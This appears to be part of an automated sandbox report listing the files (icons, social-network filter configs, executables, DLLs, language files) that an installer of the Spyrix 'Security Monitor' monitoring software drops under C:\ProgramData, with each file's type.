C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\google+.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\imp.free.fr.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\instagram.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-1BANN.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-1H5GM.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-2S7FN.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-BMU88.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-CLQ1O.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-CMR2P.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-DBQ8O.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-E045N.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-F145G.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-GBLMG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-ICR5Q.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-IPM34.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-ITOJ2.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-KK2D4.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-LSETV.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-MLP8K.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-O6VAJ.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-PF7TR.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-RE78N.tmp
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-RQFTQ.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-TJSQR.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-TOLJ8.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-TOVFB.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\is-VL6F7.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\linkedin.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\mail.png (copy)
PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\messagerie.orange.fr.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\my.screenname.aol.com.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\myspace.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\odnoklassniki.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\qqzone.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\twitter_.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\vkontakte.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\32x32\youtube.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\SNets.ini (copy)
Generic INItialization configuration [Instagram]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki.ini (copy)
Generic INItialization configuration [Marks]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\About.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Guests.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Marks.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Photos.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\Profiles.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-485DE.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-712T6.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-8NBOB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-ONLQJ.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-UF67N.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\Odnoklassniki\is-UOPS2.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte.ini (copy)
Generic INItialization configuration [Friends]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Messages.png (copy)
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Notifications.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\Replies.png (copy)
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-0IL3A.tmp
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-8V04V.tmp
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-A5OI3.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\VKontakte\is-K0FLF.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook.ini (copy)
Generic INItialization configuration [News]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Apps.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Events.png (copy)
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Facebook Ads.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Find friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends List.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Gifts.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Groups.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Invite friends.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Messages.png (copy)
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\News.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Notifications.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Payments.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Privacy.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Security.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Settings.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Subscribers.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\Welcome.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-01GJ3.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-0MLLB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-0U82B.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-1MBBO.tmp
PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-3L1ST.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-88DB9.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-B6VC8.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-BJSHI.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-CIS06.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-FVVAU.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-HBM2T.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-HDK7S.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-J4QLD.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-K5INR.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-KN6US.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-P5ULQ.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-UFLBF.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\facebook\is-VSA1C.tmp
PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-AOLNP.tmp
Generic INItialization configuration [Marks]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-N6CHK.tmp
Generic INItialization configuration [News]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\filters\is-RERTQ.tmp
Generic INItialization configuration [Friends]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-1NAQA.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\is-7NH8Q.tmp
Generic INItialization configuration [Instagram]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\ru\is-H6FGP.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\default.ini (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\zh\is-8MNTC.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\SearchEn.ini (copy)
Generic INItialization configuration [Bing]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SearchEn\is-0EGJF.tmp
Generic INItialization configuration [Bing]
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\is-P3F7J.tmp
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\url_cat (copy)
Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\iMsgInfo.bmp (copy)
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\id.cmd (copy)
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1N2MA.tmp
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-269PL.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3JAMQ.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-4Q7R0.tmp
ASCII text, with very long lines (382), with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-4QL75.tmp
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision 8, 320x240, components 3
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-632MH.tmp
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9ATRT.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ASDJS.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CF97D.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EI053.tmp
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EQFVV.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-G2FM0.tmp
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HULMH.tmp
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-IFJUI.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ILFVG.tmp
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF90R.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KF6J5.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OO1B8.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-P60MT.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PTR09.tmp
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-QFHKL.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RQ4T2.tmp
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-T1S1U.tmp
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-TQVVU.tmp
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-V94IU.tmp
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
